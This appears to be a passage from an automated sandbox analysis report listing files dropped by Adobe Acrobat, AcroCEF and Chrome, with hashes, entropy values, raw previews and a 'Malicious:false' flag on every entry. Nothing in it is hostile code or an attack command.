                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.1.2./.2.0.2.4. . .1.3.:.1.2.:.1.2. .=.=.=.....
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393)
                                                                        Category:dropped
                                                                        Size (bytes):16525
                                                                        Entropy (8bit):5.353642815103214
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                        SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                        SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                        SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):29752
                                                                        Entropy (8bit):5.413540743270633
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:076B9E00592FB2D2F4939317315EE5B3
                                                                        SHA1:34DCD174724D5A98379B7B9AB3389569BAE1EEDA
                                                                        SHA-256:E0F4E2741FC7C9D26E15DC0A6774B35F3BE6BC9F3E4C6CA4B017E241D095C618
                                                                        SHA-512:2272F31E1BFF37404DF744AB4A6F5400BD11C40CAF59A5A41DBAA951EF113D984D79B8B0675CE77D336DA5F8531D8B1317D0D429BDD0E2E0508528E1A73F7744
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                        Category:dropped
                                                                        Size (bytes):1419751
                                                                        Entropy (8bit):7.976496077007677
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F8EBE5FC81739CC053FEEEE40590DEF3
                                                                        SHA1:77897F395313139422468EDEF537EC090F655F55
                                                                        SHA-256:E61CF80525DA84703E9C673A27ECDCFEED24E6CAC0E1AE729B266B4FB548F3A4
                                                                        SHA-512:7994DF6E01FD9F740E5E4637A5E2FA01F29F1324DC79CB84845E55BA032B35408CD55C3534676C3785843BE24922359B641EC8F4447ED69B07B2934E4A7DE446
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                        Category:dropped
                                                                        Size (bytes):386528
                                                                        Entropy (8bit):7.9736851559892425
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                        Category:dropped
                                                                        Size (bytes):1407294
                                                                        Entropy (8bit):7.97605879016224
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                        SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                        SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                        SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                        Category:dropped
                                                                        Size (bytes):758601
                                                                        Entropy (8bit):7.98639316555857
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:59EE5E2FB56A099CAA8EDFD7AF821ED6
                                                                        SHA1:F5DC4F876768D57B69EC894ADE0A66E813BFED92
                                                                        SHA-256:E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75
                                                                        SHA-512:77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 17:12:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2673
                                                                        Entropy (8bit):3.9954769493997926
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BD97639A46E71CFBF1A2FF4408FBC5B1
                                                                        SHA1:1471C20EB20157FCE90A690E9173D53F6FA34D5F
                                                                        SHA-256:220AACAAF39E5CDC43C3853C18ECB4E1C15CFF84E1635B7720D3527C060D485C
                                                                        SHA-512:4F4C73257CF7AF553D8D3D0CDE09E13424162CE8901591E6CCA4DD433FB050CA853ACC74B49F875ED1C3A83817809BD32E738719E27AF6F1AF7D4A197E15024E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,......V1.K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yv.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 17:12:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2675
                                                                        Entropy (8bit):4.011218821136668
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:13460A9F33DC58056418300312027B2F
                                                                        SHA1:06B1519DB35DC45D23E430F37A5771B8DD7AA16F
                                                                        SHA-256:7E1E7D54B0622383F96707FFDC30EB515188B9ADC9BC73956C6E070650F6FED0
                                                                        SHA-512:855E9DDA495572AB06325219D0735372A5CF229A549F49E2144F0CC515CAEF5499BD049ABD0F449C760CFDF2BCACC0E0B861E69D21B697C27F36CB85A508917E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,......J1.K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yv.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2689
                                                                        Entropy (8bit):4.015298206741984
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CED32EEBCFC7592BA104DF11EC87A178
                                                                        SHA1:FE9B1DC7C5FF8C258C8AE3D6A78894F7057E654C
                                                                        SHA-256:0AFA6E363A0D4EF968A0D3075484D153E54B5103D5C289F7C9DF33A96EFB4C01
                                                                        SHA-512:5D3FD935D3ADD14707B6CA19F69CB6020C865D87502A8BE778D86544A611AC25B5FE291AD29B9A7755B2E5F268B42AF7E48154A594169B2C8DE10B95E2916F49
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yv.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 17:12:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):4.007625927912366
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:94CBB4C91E374D8F35A3115D8C50BA22
                                                                        SHA1:3B63A30B42721EF3CCD469A647E826DF33A8F820
                                                                        SHA-256:B36B9C48BF6AF402A1416E3243671384908FBB3938C9FB91854F96945F03D797
                                                                        SHA-512:7B3035F3A89F1F9AD98772357840C4930BF2F7304997A7131ABAC064ED34583FEC3A936D9623B42AC18AB483FC7360B3680F0D94DC80818D5393E41E4AE5F128
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....WE1.K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yv.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 17:12:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.9987762669283415
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DEE01E0BB4F7F6DE007AA7C24F52541A
                                                                        SHA1:EEF68CE6BEB8D5216CABFBC4AB2DCC2D3FA829B3
                                                                        SHA-256:D29003048B73BDC43B48BBF54C8074690F57F13478680EF1F635DAFEFAC0E513
                                                                        SHA-512:BAD584936F88EFF3B5BF0F590843A5D4C946B2ED0D353A19766B7B1E9E8B418B892F01D7844424E30DFBB7AB7A554C21BEA9C44F77CB159A55BEECF9CAB5EA65
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....>Q1.K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yv.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 17:12:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2679
                                                                        Entropy (8bit):4.0060713955224845
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:41FE997F9C978033355028F509BB8263
                                                                        SHA1:9ACCC08B1ECAEDC69D46074F382C709D3CD625E4
                                                                        SHA-256:875CDC2A26BC0CFFE550BCE9A13C24320FB8B43F6D7644A24B8B6072AA5CFA24
                                                                        SHA-512:7D16370AC9819790D4B96FABFCB25EFB3E9C4B74E6D86BDB474D0E8FA5E06D71EA56B187404B5AB1DD64FED1FCC0D6AD210A24CC411427CFCC252FEE651FB938
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....b.<1.K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yv.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):48316
                                                                        Entropy (8bit):5.6346993394709
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4396), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):4396
                                                                        Entropy (8bit):5.00733697476377
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CA9277A9AC3728535AB020489285CBEE
                                                                        SHA1:23EFA5DEFF8DD7B720AB7816C86C3DE82E6BBEED
                                                                        SHA-256:F58933007BAE20A6F05D57516FB31FAB852E49DFFEC8688C73DF91A92033C4D5
                                                                        SHA-512:DC60FCF2785F5377BEF8726855FA477E0EBEC503D62786D37E95409CCD7FDA8C409124DA281B2AFB951BDE4D45642B5558CBA9FEC458DCEFAF542BC16F0817AC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/engagement-window/window-confs/1725073630?cb=lpCb64064x38781
